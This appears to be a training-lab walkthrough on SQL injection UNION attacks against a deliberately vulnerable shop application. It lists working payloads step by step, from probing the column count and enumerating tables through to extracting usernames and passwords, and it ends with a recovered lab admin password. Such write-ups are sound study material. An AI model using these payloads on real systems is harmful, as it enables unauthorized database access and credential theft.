SQL injection UNION attack to retrieve multiple values within a single column
Consider a situation where the original query returns multiple columns from the target table. Instead of checking each column to determine which column contains the data type string, You can easily retrieve multiple values within a single column by concatenating the values together. This makes retrieval more straightforward, because it requires identification of only a single varchar field in the original query.
String concatenation syntaxes based on different database types are as follows,
Let’s solve the Lab-6 Retrieving multiple values from a single column
STEP #1
Determine the number of columns returned from the original query.
' ORDER BY 1--
' ORDER By 2--
' ORDER BY 3--
' ORDER BY 3-- -> Returns an error message.
Therefore number of columns returned by the original query is 2
STEP #2
Discover the column which contains data type string.
' UNION SELECT 'a',NULL--
' UNION SELECT NULL,'a'--
' UNION SELECT 'a', NULL -> Returns 500 Internal server Error ' UNION SELECT NULL, 'a' -> Returns 200 response code
Therefore only the column 2 contains string type data.
STEP #3
Query the database to retrieve database type.
' UNION SELECT NULL, version() --
STEP #4
Determine the table names.
' UNION SELECT NULL, table_name FROM information_schema.tables --
Table which contains usernames and passwords might be the table named users.
STEP #5
Determine the column names.
' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users'--
There are 2 columns in the table users named username and password.
STEP #6
Let’s use the above information to retrieve the administrator’s password.
Since the original query contains only one varchar field, you can use string concatenation to retrieve both usernames and passwords from the database.
' UNION SELECT NULL, username|| '-' ||password FROM users--
STEP #7
Log in as the administrator user.
Username: administratorPassword: rzgfts9lagahzzcfstwq